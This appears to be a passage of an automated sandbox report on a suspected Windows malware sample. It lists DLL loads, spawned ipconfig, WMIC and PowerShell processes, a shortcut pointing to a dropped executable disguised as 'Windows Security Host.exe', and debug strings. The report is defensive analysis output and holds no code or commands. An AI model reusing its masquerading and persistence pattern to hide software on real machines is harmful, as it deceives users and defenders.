                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\ipconfig.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\ipconfig.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: version.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: version.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Windows Security Host.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Windows Security Host.lnk.3.dr | LNK file: ..\..\..\..\..\..\..\Windows Security Host.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 8Hd0ZExgJz.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 8Hd0ZExgJz.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Runtime.Serialization.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Data.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: m.pdbE source: BootstrapperV1.23.exe, 00000004.00000002.1620001182.000001EFAF449000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96E0C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Drawing.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdllG source: BootstrapperV1.23.exe, 00000004.00000002.1620001182.000001EFAF3B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Drawing.pdbX`h source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Configuration.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Data.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Xml.pdbp+ source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Xml.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.pdb source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96E0C000.00000004.00000800.00020000.00000000.sdmp, WERAD5E.tmp.dmp.23.dr
Source: Binary string: mscorlib.pdbh source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Core.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Numerics.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Data.pdbH source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Windows.Forms.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: mscorlib.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Drawing.pdb source: WERAD5E.tmp.dmp.23.dr
